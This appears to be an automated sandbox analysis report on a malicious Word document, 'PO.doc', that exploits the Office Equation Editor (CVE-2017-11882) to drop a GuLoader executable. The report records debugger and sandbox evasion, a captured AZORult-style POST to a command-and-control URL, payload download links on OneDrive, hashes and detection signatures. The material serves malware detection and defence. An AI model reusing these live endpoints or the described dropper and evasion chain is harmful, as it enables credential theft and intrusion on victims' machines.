Loading ...

Play interactive tourEdit tour

Analysis Report PO.doc

Overview

General Information

Sample Name:PO.doc
Analysis ID:288932
MD5:c7b96591a6e4dea501b8ab1eb546682f
SHA1:7bbdf38ec3d54d9220d3523a551bb5e59fd3664a
SHA256:bfd904bca6651f85d90eda740da722d60d6b28e24e1f4ea859d5f021c4a9b4fe
Tags:doc

Most interesting Screenshot:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Yara detected VB6 Downloader Generic
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
PE file contains strange resources
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 1888 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 1320 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • jknbdpaq.exe (PID: 1472 cmdline: C:\Users\user\AppData\Roaming\jknbdpaq.exe MD5: ED5C029E13A88CD8A2ECD9F48B9A83B7)
      • jknbdpaq.exe (PID: 2416 cmdline: C:\Users\user\AppData\Roaming\jknbdpaq.exe MD5: ED5C029E13A88CD8A2ECD9F48B9A83B7)
  • EQNEDT32.EXE (PID: 2924 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000002.2100926279.00000000001B0000.00000040.00000001.sdmpJoeSecurity_GuLoaderYara detected GuLoaderJoe Security
    Process Memory Space: jknbdpaq.exe PID: 2416JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
      Process Memory Space: jknbdpaq.exe PID: 2416JoeSecurity_GuLoaderYara detected GuLoaderJoe Security
        Process Memory Space: jknbdpaq.exe PID: 1472JoeSecurity_VB6DownloaderGenericYara detected VB6 Downloader GenericJoe Security
          Process Memory Space: jknbdpaq.exe PID: 1472JoeSecurity_GuLoaderYara detected GuLoaderJoe Security

            Sigma Overview

            System Summary:

            barindex
            Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
            Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\jknbdpaq.exe, CommandLine: C:\Users\user\AppData\Roaming\jknbdpaq.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\jknbdpaq.exe, NewProcessName: C:\Users\user\AppData\Roaming\jknbdpaq.exe, OriginalFileName: C:\Users\user\AppData\Roaming\jknbdpaq.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1320, ProcessCommandLine: C:\Users\user\AppData\Roaming\jknbdpaq.exe, ProcessId: 1472
            Sigma detected: File Dropped By EQNEDT32EXEShow sources
            Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1320, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exe

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: PO.docAvira: detected
            Multi AV Scanner detection for domain / URLShow sources
            Source: hotelavlokan.comVirustotal: Detection: 10%Perma Link
            Source: http://hotelavlokan.com/angel/PL341/index.phpVirustotal: Detection: 6%Perma Link
            Multi AV Scanner detection for submitted fileShow sources
            Source: PO.docVirustotal: Detection: 48%Perma Link

            Exploits:

            barindex
            Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\jknbdpaq.exeJump to behavior
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: global trafficDNS query: name: www.uttaranchaltoday.com
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.28.1.185:443
            Source: global trafficTCP traffic: 192.168.2.22:49165 -> 104.28.1.185:443

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49168 -> 104.28.24.76:80
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
            Source: global trafficHTTP traffic detected: POST /angel/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: hotelavlokan.comContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 3b 70 9d 34 70 9d 37 13 8b 30 6d 8b 30 64 ed 26 66 98 26 67 ea 26 66 96 26 66 9d 26 66 9b 26 66 97 42 13 8b 30 64 ec Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp;p4p70m0d&f&g&f&f&f&fB0d
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{B4F37B13-97C0-4A14-814E-1968BCE52029}.tmpJump to behavior
            Source: jknbdpaq.exe, 00000005.00000002.2101760081.0000000000910000.00000004.00000020.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
            Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
            Source: jknbdpaq.exe, 00000005.00000002.2101760081.0000000000910000.00000004.00000020.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
            Source: unknownDNS traffic detected: queries for: www.uttaranchaltoday.com
            Source: unknownHTTP traffic detected: POST /angel/PL341/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: hotelavlokan.comContent-Length: 105Cache-Control: no-cacheData Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 3b 70 9d 34 70 9d 37 13 8b 30 6d 8b 30 64 ed 26 66 98 26 67 ea 26 66 96 26 66 9d 26 66 9b 26 66 97 42 13 8b 30 64 ec Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp;p4p70m0d&f&g&f&f&f&fB0d
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
            Source: jknbdpaq.exe, 00000005.00000002.2101777111.0000000000935000.00000004.00000020.sdmpString found in binary or memory: http://hotelavlokan.com/angel/PL341/index.php
            Source: jknbdpaq.exe, 00000005.00000003.2100759395.000000001E7A0000.00000004.00000001.sdmpString found in binary or memory: http://hotelavlokan.com/angel/PL341/index.phpA
            Source: jknbdpaq.exe, 00000005.00000002.2101777111.0000000000935000.00000004.00000020.sdmpString found in binary or memory: http://hotelavlokan.com/angel/PL341/index.phpw
            Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
            Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
            Source: jknbdpaq.exe, 00000004.00000002.2098536832.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
            Source: jknbdpaq.exe, 00000004.00000002.2098536832.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.digicert.com0:
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.msocsp.com0
            Source: jknbdpaq.exe, 00000004.00000002.2098536832.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
            Source: jknbdpaq.exe, 00000004.00000002.2098536832.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
            Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
            Source: jknbdpaq.exe, 00000004.00000002.2098536832.00000000032D7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
            Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
            Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
            Source: jknbdpaq.exe, 00000005.00000002.2101760081.0000000000910000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
            Source: jknbdpaq.exe, 00000005.00000002.2101760081.0000000000910000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/$C
            Source: jknbdpaq.exe, 00000005.00000002.2101777111.0000000000935000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=4C3F5C65A99DA195&resid=4C3F5C65A99DA195%21189&authkey=AGDK6_h
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: https://vim0zq.bl.files.1drv.com/
            Source: jknbdpaq.exe, 00000005.00000002.2101797169.0000000000952000.00000004.00000020.sdmp, jknbdpaq.exe, 00000005.00000002.2101844259.000000000099C000.00000004.00000020.sdmpString found in binary or memory: https://vim0zq.bl.files.1drv.com/y4mJ4JmV_odR7SEu2rvz5t4QuptNc14KJHuH0VZBkduvbWYhfVMcLlD4VMfJs8z3lly
            Source: jknbdpaq.exe, 00000005.00000002.2101804777.000000000095A000.00000004.00000020.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165

            System Summary:

            barindex
            Office equation editor drops PE fileShow sources
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\jknbdpaq.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A0212 EnumWindows,NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_002A0212
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A3772 NtProtectVirtualMemory,4_2_002A3772
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A0B56 NtWriteVirtualMemory,4_2_002A0B56
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A3ABF NtResumeThread,4_2_002A3ABF
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A1DCA NtSetInformationThread,CloseServiceHandle,TerminateProcess,LoadLibraryA,4_2_002A1DCA
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A102B NtWriteVirtualMemory,4_2_002A102B
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A160F NtWriteVirtualMemory,4_2_002A160F
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A3B1A NtResumeThread,4_2_002A3B1A
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A2C18 NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_002A2C18
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A2B6E NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_002A2B6E
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A028A NtSetInformationThread,CloseServiceHandle,TerminateProcess,4_2_002A028A
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A3B87 NtResumeThread,4_2_002A3B87
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A14EA NtWriteVirtualMemory,4_2_002A14EA
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A3BED NtResumeThread,4_2_002A3BED
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A15FC NtWriteVirtualMemory,4_2_002A15FC
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A14FD NtWriteVirtualMemory,4_2_002A14FD
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A16F5 NtWriteVirtualMemory,4_2_002A16F5
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A3AC9 NtResumeThread,4_2_002A3AC9
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B0212 EnumWindows,NtSetInformationThread,CloseServiceHandle,5_2_001B0212
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B3772 NtProtectVirtualMemory,5_2_001B3772
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B129A RtlAddVectoredExceptionHandler,NtProtectVirtualMemory,NtProtectVirtualMemory,5_2_001B129A
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B3ABF NtSetInformationThread,5_2_001B3ABF
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B1AF8 NtProtectVirtualMemory,5_2_001B1AF8
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B3B1A NtSetInformationThread,5_2_001B3B1A
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B2C18 NtSetInformationThread,CloseServiceHandle,5_2_001B2C18
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B1254 NtProtectVirtualMemory,5_2_001B1254
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B2B6E NtSetInformationThread,CloseServiceHandle,5_2_001B2B6E
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B028A NtSetInformationThread,CloseServiceHandle,5_2_001B028A
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B3B87 NtSetInformationThread,5_2_001B3B87
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B05B5 NtProtectVirtualMemory,LoadLibraryA,5_2_001B05B5
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B12D4 NtProtectVirtualMemory,5_2_001B12D4
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B3AC9 NtSetInformationThread,5_2_001B3AC9
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B1AFE NtProtectVirtualMemory,5_2_001B1AFE
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B3BED NtSetInformationThread,5_2_001B3BED
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_004052584_2_00405258
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_004052744_2_00405274
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_004052164_2_00405216
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_0040522E4_2_0040522E
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_0040529A4_2_0040529A
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_004051724_2_00405172
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_004029324_2_00402932
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_004051EA4_2_004051EA
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A2B6E4_2_002A2B6E
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B2B6E5_2_001B2B6E
            Source: angelwe[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: jknbdpaq.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: jknbdpaq.exe, 00000004.00000002.2098318417.00000000030F0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
            Source: classification engineClassification label: mal100.troj.expl.evad.winDOC@7/11@4/2
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$PO.docJump to behavior
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeMutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-874F81C6-8359AF1B
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCD6C.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Source: PO.docVirustotal: Detection: 48%
            Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\jknbdpaq.exe C:\Users\user\AppData\Roaming\jknbdpaq.exe
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\jknbdpaq.exe C:\Users\user\AppData\Roaming\jknbdpaq.exe
            Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\jknbdpaq.exe C:\Users\user\AppData\Roaming\jknbdpaq.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeProcess created: C:\Users\user\AppData\Roaming\jknbdpaq.exe C:\Users\user\AppData\Roaming\jknbdpaq.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItemsJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior

            Data Obfuscation:

            barindex
            Yara detected GuLoaderShow sources
            Source: Yara matchFile source: 00000005.00000002.2100926279.00000000001B0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: jknbdpaq.exe PID: 2416, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: jknbdpaq.exe PID: 1472, type: MEMORY
            Yara detected VB6 Downloader GenericShow sources
            Source: Yara matchFile source: Process Memory Space: jknbdpaq.exe PID: 2416, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: jknbdpaq.exe PID: 1472, type: MEMORY
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 4_2_002A2C89 pushfd ; retf 4_2_002A2C96
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B2C89 pushfd ; retf 5_2_001B2C96
            Source: C:\Users\user\AppData\Roaming\jknbdpaq.exeCode function: 5_2_001B26F7 push esp; iretd 5_2_001B26F8
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\angelwe[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\jknbdpaq.exeJump to dropped file
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
